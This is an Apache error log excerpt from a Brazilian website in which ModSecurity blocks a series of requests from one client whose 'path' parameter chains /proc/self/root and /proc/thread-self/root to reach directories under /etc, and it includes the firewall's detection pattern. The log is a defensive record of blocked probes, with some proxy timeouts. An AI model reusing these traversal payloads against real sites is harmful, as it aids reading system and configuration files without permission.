https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 15:44:50.698070 2026] [:error] [pid 15051:tid 140411574073088] [client 74.7.241.31:46418] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abryoimAPhZkrhU8w4mf1AAAAJQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 15:44:56.492728 2026] [:error] [pid 17887:tid 140411582465792] [client 74.7.241.31:46420] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abryqAkwaGbbGflqUZBIeQAAANM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 15:45:01.174866 2026] [proxy_fcgi:error] [pid 15051:tid 140411741927168] (70007)The timeout specified has expired: [client 45.227.253.15:54468] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 15:45:06.121642 2026] [:error] [pid 15826:tid 140411540502272] [client 74.7.241.31:49578] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrysuoXxyEfFpUF8f-rtgAAAVg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 15:45:17.575473 2026] [:error] [pid 30077:tid 140411658000128] [client 74.7.241.31:40646] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abryvfu8EFLIOrSqIps2JAAAAko"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 15:45:24.129816 2026] [proxy_fcgi:error] [pid 30077:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:58554] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 15:45:29.959550 2026] [:error] [pid 17887:tid 140411574073088] [client 74.7.241.31:44988] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abryyQkwaGbbGflqUZBIiQAAANQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 15:45:45.129940 2026] [proxy_fcgi:error] [pid 29882:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:59668] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 15:45:45.219103 2026] [:error] [pid 31803:tid 140411607643904] [client 74.7.241.31:36868] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abry2eyqAr6etmhZHNr-6wAAAFA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 15:45:58.050540 2026] [:error] [pid 29882:tid 140411725141760] [client 74.7.241.31:54224] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abry5kzinOy1jxa1j4dTBwAAAQI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 15:46:06.101843 2026] [proxy_fcgi:error] [pid 31803:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:60390] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 15:46:11.308548 2026] [:error] [pid 26799:tid 140411691570944] [client 74.7.241.31:52556] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abry89a6ubjKNq_cu4bTSgAAA0Y"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 15:46:22.090985 2026] [:error] [pid 17887:tid 140411574073088] [client 74.7.241.31:45026] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abry_gkwaGbbGflqUZBIqQAAANQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 15:46:27.926048 2026] [proxy_fcgi:error] [pid 17653:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:32784] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 15:46:30.293647 2026] [:error] [pid 30077:tid 140411658000128] [client 74.7.241.31:41086] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrzBvu8EFLIOrSqIps2SAAAAko"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 15:46:37.904437 2026] [:error] [pid 15051:tid 140411741927168] [client 74.7.241.31:57122] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrzDSmAPhZkrhU8w4mgEAAAAIA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 15:46:42.066996 2026] [:error] [pid 17653:tid 140411632822016] [client 74.7.241.31:57134] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrzEsdf6f5d65gmYZQK-gAAAs0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 15:46:44.758667 2026] [:error] [pid 17653:tid 140411658000128] [client 74.7.241.31:57150] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrzFMdf6f5d65gmYZQK_QAAAso"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 15:46:46.983122 2026] [:error] [pid 15051:tid 140411632822016] [client 74.7.241.31:57152] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrzFimAPhZkrhU8w4mgFwAAAI0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 15:46:49.141862 2026] [proxy_fcgi:error] [pid 11816:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:33700] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 15:46:51.240331 2026] [:error] [pid 15051:tid 140411741927168] [client 74.7.241.31:41512] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrzGymAPhZkrhU8w4mgGgAAAIA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 15:46:55.641946 2026] [:error] [pid 31803:tid 140411616036608] [client 74.7.241.31:41524] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrzH-yqAr6etmhZHNr_DQAAAE8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 15:46:57.984599 2026] [:error] [pid 26799:tid 140411691570944] [client 74.7.241.31:41342] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrzIda6ubjKNq_cu4bTagAAA0Y"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 15:47:00.150605 2026] [:error] [pid 29882:tid 140411540502272] [client 74.7.241.31:41348] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrzJEzinOy1jxa1j4dTOwAAARg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 15:47:03.483706 2026] [:error] [pid 17653:tid 140411658000128] [client 74.7.241.31:41362] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrzJ8df6f5d65gmYZQLEQAAAso"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 15:47:06.394824 2026] [:error] [pid 31803:tid 140411716749056] [client 74.7.241.31:41366] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrzKuyqAr6etmhZHNr_EgAAAEM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 15:47:11.117534 2026] [proxy_fcgi:error] [pid 17653:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:34792] AH01075: Error dispatching request to : (polling)
